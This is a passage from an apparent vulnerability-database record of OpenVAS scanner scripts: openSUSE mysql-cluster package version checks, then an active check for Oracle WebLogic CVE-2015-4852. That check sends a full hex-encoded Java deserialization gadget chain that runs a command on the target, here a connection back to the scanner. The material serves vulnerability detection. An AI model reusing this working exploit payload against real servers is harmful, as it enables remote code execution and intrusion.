if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-extra\", rpm:\"mysql-cluster-ndb-extra~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-extra-debuginfo\", rpm:\"mysql-cluster-ndb-extra-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-management\", rpm:\"mysql-cluster-ndb-management~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-management-debuginfo\", rpm:\"mysql-cluster-ndb-management-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-storage\", rpm:\"mysql-cluster-ndb-storage~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-storage-debuginfo\", rpm:\"mysql-cluster-ndb-storage-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-tools\", rpm:\"mysql-cluster-ndb-tools~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-tools-debuginfo\", rpm:\"mysql-cluster-ndb-tools-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-test\", rpm:\"mysql-cluster-test~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-test-debuginfo\", rpm:\"mysql-cluster-test-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-tools\", rpm:\"mysql-cluster-tools~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-tools-debuginfo\", rpm:\"mysql-cluster-tools-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE12.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclusterclient16\", rpm:\"libmysqlclusterclient16~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclusterclient16-debuginfo\", rpm:\"libmysqlclusterclient16-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclusterclient_r16\", rpm:\"libmysqlclusterclient_r16~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclusterclient_r16-debuginfo\", rpm:\"libmysqlclusterclient_r16-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster\", rpm:\"mysql-cluster~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-bench\", rpm:\"mysql-cluster-bench~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-bench-debuginfo\", rpm:\"mysql-cluster-bench-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-client\", rpm:\"mysql-cluster-client~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-client-debuginfo\", rpm:\"mysql-cluster-client-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-debug\", rpm:\"mysql-cluster-debug~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-debug-debuginfo\", rpm:\"mysql-cluster-debug-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-debuginfo\", rpm:\"mysql-cluster-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-debugsource\", rpm:\"mysql-cluster-debugsource~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-extra\", rpm:\"mysql-cluster-ndb-extra~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-extra-debuginfo\", rpm:\"mysql-cluster-ndb-extra-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-management\", rpm:\"mysql-cluster-ndb-management~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-management-debuginfo\", rpm:\"mysql-cluster-ndb-management-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-storage\", rpm:\"mysql-cluster-ndb-storage~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-storage-debuginfo\", rpm:\"mysql-cluster-ndb-storage-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-tools\", rpm:\"mysql-cluster-ndb-tools~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-ndb-tools-debuginfo\", rpm:\"mysql-cluster-ndb-tools-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-test\", rpm:\"mysql-cluster-test~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-test-debuginfo\", rpm:\"mysql-cluster-test-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-tools\", rpm:\"mysql-cluster-tools~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-tools-debuginfo\", rpm:\"mysql-cluster-tools-debuginfo~7.1.22~2.7.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-29T22:16:48", "description": "Oracle WebLogic Server is prone to a remote code-execution vulnerability.", "cvss3": {}, "published": "2016-07-27T00:00:00", "type": "openvas", "title": "Oracle WebLogic Server Java Deserialization Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2020-04-23T00:00:00", "id": "OPENVAS:1361412562310105829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105829", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Java Deserialization Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105829\");\n script_cve_id(\"CVE-2015-4852\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"2020-04-23T09:54:12+0000\");\n\n script_name(\"Oracle WebLogic Server Java Deserialization Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code\n in the context of the affected application.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a serialized java object which try to open a ssh connection to a random\n port on the scanner and then check for the tcp-syn packet from this connection.\");\n\n script_tag(name:\"insight\", value:\"Unsafe deserialization allows unauthenticated remote attackers to run\n arbitrary code on the Jboss server.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references or vendor advisory for more information.\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to a remote code-execution vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-23 09:54:12 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-07-27 14:18:32 +0200 (Wed, 27 Jul 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n script_require_ports(\"Services/weblogic-t3\", 7001);\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE, service: \"weblogic-t3\" ) )\n exit( 0 );\n\nif( ! soc = open_sock_tcp( port ) )\n exit( 0 );\n\nreq = 't3 12.2.1\\n' +\n 'AS:255\\n' +\n 'HL:19\\n' +\n 'MS:10000000\\n' +\n 'PU:t3://us-l-breens:7001\\n\\n';\n\nsend( socket:soc, data:req );\nbuf = recv( socket:soc, length:128 );\n\nif( \"HELO\" >!< buf ) {\n close( soc );\n exit( 0 );\n}\n\npayload = raw_string(\n0x01,0x65,0x01,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x71,0x00,\n0x00,0xea,0x60,0x00,0x00,0x00,0x18,0x43,0x2e,0xc6,0xa2,0xa6,0x39,0x85,0xb5,0xaf,\n0x7d,0x63,0xe6,0x43,0x83,0xf4,0x2a,0x6d,0x92,0xc9,0xe9,0xaf,0x0f,0x94,0x72,0x02,\n0x79,0x73,0x72,0x00,0x78,0x72,0x01,0x78,0x72,0x02,0x78,0x70,0x00,0x00,0x00,0x0c,\n0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,\n0x00,0x70,0x70,0x70,0x70,0x70,0x70,0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x02,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x70,0x06,0xfe,0x01,\n0x00,0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x1d,0x77,0x65,0x62,0x6c,0x6f,0x67,\n0x69,0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x43,0x6c,0x61,0x73,0x73,0x54,0x61,0x62,\n0x6c,0x65,0x45,0x6e,0x74,0x72,0x79,0x2f,0x52,0x65,0x81,0x57,0xf4,0xf9,0xed,0x0c,\n0x00,0x00,0x78,0x70,0x72,0x00,0x24,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2e,\n0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,0x61,0x6c,0x2e,\n0x50,0x61,0x63,0x6b,0x61,0x67,0x65,0x49,0x6e,0x66,0x6f,0xe6,0xf7,0x23,0xe7,0xb8,\n0xae,0x1e,0xc9,0x02,0x00,0x09,0x49,0x00,0x05,0x6d,0x61,0x6a,0x6f,0x72,0x49,0x00,\n0x05,0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,0x61,0x74,0x63,0x68,0x55,0x70,\n0x64,0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,0x6c,0x69,0x6e,0x67,0x50,0x61,\n0x74,0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x61,0x63,\n0x6b,0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,0x61,0x72,0x79,0x50,0x61,0x74,\n0x63,0x68,0x4c,0x00,0x09,0x69,0x6d,0x70,0x6c,0x54,0x69,0x74,0x6c,0x65,0x74,0x00,\n0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,\n0x6e,0x67,0x3b,0x4c,0x00,0x0a,0x69,0x6d,0x70,0x6c,0x56,0x65,0x6e,0x64,0x6f,0x72,\n0x71,0x00,0x7e,0x00,0x03,0x4c,0x00,0x0b,0x69,0x6d,0x70,0x6c,0x56,0x65,0x72,0x73,\n0x69,0x6f,0x6e,0x71,0x00,0x7e,0x00,0x03,0x78,0x70,0x77,0x02,0x00,0x00,0x78,0xfe,\n0x01,0x00,0x00);\n\npayload += raw_string(\n0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x32,0x73,0x75,0x6e,0x2e,0x72,0x65,0x66,0x6c,\n0x65,0x63,0x74,0x2e,0x61,0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x2e,0x41,\n0x6e,0x6e,0x6f,0x74,0x61,0x74,0x69,0x6f,0x6e,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,\n0x69,0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x55,0xca,0xf5,0x0f,0x15,0xcb,\n0x7e,0xa5,0x02,0x00,0x02,0x4c,0x00,0x0c,0x6d,0x65,0x6d,0x62,0x65,0x72,0x56,0x61,\n0x6c,0x75,0x65,0x73,0x74,0x00,0x0f,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x75,0x74,0x69,\n0x6c,0x2f,0x4d,0x61,0x70,0x3b,0x4c,0x00,0x04,0x74,0x79,0x70,0x65,0x74,0x00,0x11,\n0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,\n0x3b,0x78,0x70,0x73,0x7d,0x00,0x00,0x00,0x01,0x00,0x0d,0x6a,0x61,0x76,0x61,0x2e,\n0x75,0x74,0x69,0x6c,0x2e,0x4d,0x61,0x70,0x78,0x72,0x00,0x17,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2e,0x50,0x72,\n0x6f,0x78,0x79,0xe1,0x27,0xda,0x20,0xcc,0x10,0x43,0xcb,0x02,0x00,0x01,0x4c,0x00,\n0x01,0x68,0x74,0x00,0x25,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,\n0x72,0x65,0x66,0x6c,0x65,0x63,0x74,0x2f,0x49,0x6e,0x76,0x6f,0x63,0x61,0x74,0x69,\n0x6f,0x6e,0x48,0x61,0x6e,0x64,0x6c,0x65,0x72,0x3b,0x78,0x70,0x73,0x71,0x00,0x7e,\n0x00,0x00,0x73,0x72,0x00,0x2a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x6d,0x61,0x70,0x2e,0x4c,0x61,0x7a,0x79,0x4d,0x61,0x70,\n0x6e,0xe5,0x94,0x82,0x9e,0x79,0x10,0x94,0x03,0x00,0x01,0x4c,0x00,0x07,0x66,0x61,\n0x63,0x74,0x6f,0x72,0x79,0x74,0x00,0x2c,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,\n0x63,0x68,0x65,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,\n0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,\n0x6d,0x65,0x72,0x3b,0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,\n0x61,0x63,0x68,0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,\n0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,\n0x73,0x2e,0x43,0x68,0x61,0x69,0x6e,0x65,0x64,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,\n0x72,0x6d,0x65,0x72,0x30,0xc7,0x97,0xec,0x28,0x7a,0x97,0x04,0x02,0x00,0x01,0x5b,\n0x00,0x0d,0x69,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x73,0x74,\n0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2f,0x61,0x70,0x61,0x63,0x68,0x65,0x2f,0x63,\n0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2f,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,0x69,0x6f,\n0x6e,0x73,0x2f,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x2d,0x5b,0x4c,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,\n0x72,0x3b,0xbd,0x56,0x2a,0xf1,0xd8,0x34,0x18,0x99,0x02,0x00,0x00,0x78,0x70,0x00,\n0x00,0x00,0x05,0x73,0x72,0x00,0x3b,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,\n0x65,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,\n0x74,0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x43,\n0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,\n0x65,0x72,0x58,0x76,0x90,0x11,0x41,0x02,0xb1,0x94,0x02,0x00,0x01,0x4c,0x00,0x09,\n0x69,0x43,0x6f,0x6e,0x73,0x74,0x61,0x6e,0x74,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,\n0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x78,0x70,\n0x76,0x72,0x00,0x11,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x52,0x75,\n0x6e,0x74,0x69,0x6d,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\n0x78,0x70,0x73,0x72,0x00,0x3a,0x6f,0x72,0x67,0x2e,0x61,0x70,0x61,0x63,0x68,0x65,\n0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x73,0x2e,0x63,0x6f,0x6c,0x6c,0x65,0x63,0x74,\n0x69,0x6f,0x6e,0x73,0x2e,0x66,0x75,0x6e,0x63,0x74,0x6f,0x72,0x73,0x2e,0x49,0x6e,\n0x76,0x6f,0x6b,0x65,0x72,0x54,0x72,0x61,0x6e,0x73,0x66,0x6f,0x72,0x6d,0x65,0x72,\n0x87,0xe8,0xff,0x6b,0x7b,0x7c,0xce,0x38,0x02,0x00,0x03,0x5b,0x00,0x05,0x69,0x41,\n0x72,0x67,0x73,0x74,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,\n0x67,0x2f,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x4c,0x00,0x0b,0x69,0x4d,0x65,0x74,\n0x68,0x6f,0x64,0x4e,0x61,0x6d,0x65,0x74,0x00,0x12,0x4c,0x6a,0x61,0x76,0x61,0x2f,\n0x6c,0x61,0x6e,0x67,0x2f,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0x5b,0x00,0x0b,0x69,\n0x50,0x61,0x72,0x61,0x6d,0x54,0x79,0x70,0x65,0x73,0x74,0x00,0x12,0x5b,0x4c,0x6a,\n0x61,0x76,0x61,0x2f,0x6c,0x61,0x6e,0x67,0x2f,0x43,0x6c,0x61,0x73,0x73,0x3b,0x78,\n0x70,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x3b,0x90,0xce,0x58,0x9f,0x10,0x73,0x29,0x6c,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x02,0x74,0x00,0x0a,0x67,0x65,0x74,0x52,\n0x75,0x6e,0x74,0x69,0x6d,0x65,0x75,0x72,0x00,0x12,0x5b,0x4c,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x43,0x6c,0x61,0x73,0x73,0x3b,0xab,0x16,0xd7,0xae,\n0xcb,0xcd,0x5a,0x99,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x00,0x74,0x00,0x09,\n0x67,0x65,0x74,0x4d,0x65,0x74,0x68,0x6f,0x64,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,\n0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,\n0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0xa0,0xf0,0xa4,0x38,0x7a,0x3b,0xb3,0x42,0x02,\n0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1e,0x73,0x71,0x00,0x7e,0x00,0x16,\n0x75,0x71,0x00,0x7e,0x00,0x1b,0x00,0x00,0x00,0x02,0x70,0x75,0x71,0x00,0x7e,0x00,\n0x1b,0x00,0x00,0x00,0x00,0x74,0x00,0x06,0x69,0x6e,0x76,0x6f,0x6b,0x65,0x75,0x71,\n0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,0x02,0x76,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0x00,0x00,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x76,0x71,0x00,0x7e,0x00,0x1b,0x73,\n0x71,0x00,0x7e,0x00,0x16,0x75,0x72,0x00,0x13,0x5b,0x4c,0x6a,0x61,0x76,0x61,0x2e,\n0x6c,0x61,0x6e,0x67,0x2e,0x53,0x74,0x72,0x69,0x6e,0x67,0x3b,0xad,0xd2,0x56,0xe7,\n0xe9,0x1d,0x7b,0x47,0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x74,0x00);\n\nlport = rand() % 64512 + 1024;\n\nif( host_runs(\"Windows\") == \"yes\" )\n cmd = 'telnet ' + this_host() + ' ' + lport;\nelse\n cmd = 'ssh -q -i /dev/null -p ' + lport + ' ' + this_host();\n\nlen = raw_string( strlen( cmd ) );\n\npayload += len + cmd + raw_string(\n0x74,0x00,0x04,0x65,0x78,0x65,0x63,0x75,0x71,0x00,0x7e,0x00,0x1e,0x00,0x00,0x00,\n0x01,0x71,0x00,0x7e,0x00,0x23,0x73,0x71,0x00,0x7e,0x00,0x11,0x73,0x72,0x00,0x11,\n0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x49,0x6e,0x74,0x65,0x67,0x65,\n0x72,0x12,0xe2,0xa0,0xa4,0xf7,0x81,0x87,0x38,0x02,0x00,0x01,0x49,0x00,0x05,0x76,\n0x61,0x6c,0x75,0x65,0x78,0x72,0x00,0x10,0x6a,0x61,0x76,0x61,0x2e,0x6c,0x61,0x6e,\n0x67,0x2e,0x4e,0x75,0x6d,0x62,0x65,0x72,0x86,0xac,0x95,0x1d,0x0b,0x94,0xe0,0x8b,\n0x02,0x00,0x00,0x78,0x70,0x00,0x00,0x00,0x01,0x73,0x72,0x00,0x11,0x6a,0x61,0x76,\n0x61,0x2e,0x75,0x74,0x69,0x6c,0x2e,0x48,0x61,0x73,0x68,0x4d,0x61,0x70,0x05,0x07,\n0xda,0xc1,0xc3,0x16,0x60,0xd1,0x03,0x00,0x02,0x46,0x00,0x0a,0x6c,0x6f,0x61,0x64,\n0x46,0x61,0x63,0x74,0x6f,0x72,0x49,0x00,0x09,0x74,0x68,0x72,0x65,0x73,0x68,0x6f,\n0x6c,0x64,0x78,0x70,0x3f,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x77,0x08,0x00,0x00,\n0x00,0x10,0x00,0x00,0x00,0x00,0x78,0x78,0x76,0x72,0x00,0x12,0x6a,0x61,0x76,0x61,\n0x2e,0x6c,0x61,0x6e,0x67,0x2e,0x4f,0x76,0x65,0x72,0x72,0x69,0x64,0x65,0x00,0x00,\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x70,0x71,0x00,0x7e,0x00,0x3a);\n\npayload += raw_string(\n0xfe,0x01,0x00,0x00,0xac,0xed,0x00,0x05,0x73,0x72,0x00,0x1d,0x77,0x65,0x62,0x6c,\n0x6f,0x67,0x69,0x63,0x2e,0x72,0x6a,0x76,0x6d,0x2e,0x43,0x6c,0x61,0x73,0x73,0x54,\n0x61,0x62,0x6c,0x65,0x45,0x6e,0x74,0x72,0x79,0x2f,0x52,0x65,0x81,0x57,0xf4,0xf9,\n0xed,0x0c,0x00,0x00,0x78,0x70,0x72,0x00,0x21,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,\n0x63,0x2e,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,0x2e,0x69,0x6e,0x74,0x65,0x72,0x6e,0x61,\n0x6c,0x2e,0x50,0x65,0x65,0x72,0x49,0x6e,0x66,0x6f,0x58,0x54,0x74,0xf3,0x9b,0xc9,\n0x08,0xf1,0x02,0x00,0x07,0x49,0x00,0x05,0x6d,0x61,0x6a,0x6f,0x72,0x49,0x00,0x05,\n0x6d,0x69,0x6e,0x6f,0x72,0x49,0x00,0x0b,0x70,0x61,0x74,0x63,0x68,0x55,0x70,0x64,\n0x61,0x74,0x65,0x49,0x00,0x0c,0x72,0x6f,0x6c,0x6c,0x69,0x6e,0x67,0x50,0x61,0x74,\n0x63,0x68,0x49,0x00,0x0b,0x73,0x65,0x72,0x76,0x69,0x63,0x65,0x50,0x61,0x63,0x6b,\n0x5a,0x00,0x0e,0x74,0x65,0x6d,0x70,0x6f,0x72,0x61,0x72,0x79,0x50,0x61,0x74,0x63,\n0x68,0x5b,0x00,0x08,0x70,0x61,0x63,0x6b,0x61,0x67,0x65,0x73,0x74,0x00,0x27,0x5b,\n0x4c,0x77,0x65,0x62,0x6c,0x6f,0x67,0x69,0x63,0x2f,0x63,0x6f,0x6d,0x6d,0x6f,0x6e,\n0x2f,0x69,0x